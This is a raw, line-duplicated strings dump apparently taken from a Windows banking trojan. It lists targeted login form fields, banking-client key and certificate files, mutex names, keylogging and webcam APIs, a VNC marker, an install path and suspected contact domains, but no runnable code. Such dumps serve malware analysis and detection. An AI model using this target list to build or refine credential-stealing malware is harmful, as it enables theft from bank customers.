AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
SYSTEM!XP7!F9BE9A8A
SYSTEM!XP7!F9BE9A8A
%WinDir%\apppatch\dbvpfca.exe
%WinDir%\apppatch\dbvpfca.exe
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
`.data
`.data
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current